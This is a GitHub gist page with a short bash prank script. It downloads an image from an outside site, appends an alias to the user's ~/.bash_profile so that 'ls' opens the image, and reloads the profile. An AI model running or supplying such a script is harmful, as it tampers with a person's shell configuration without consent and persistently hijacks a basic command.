Skip to content

Instantly share code, notes, and snippets.

@pasali
Last active July 19, 2018 09:08
Show Gist options
  • Save pasali/b440051b1bef94d61c1657021a769612 to your computer and use it in GitHub Desktop.
Save pasali/b440051b1bef94d61c1657021a769612 to your computer and use it in GitHub Desktop.
#!/usr/bin/env bash
curl -o $HOME/Downloads/maxdefaultimage.jpg http://img01.alkislarlayasiyorum.com/images/all_content_thumbnail/109/109043-8950.jpg
echo 'alias ls="open $HOME/Downloads/maxdefaultimage.jpg"' >> $HOME/.bash_profile
source $HOME/.bash_profile
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment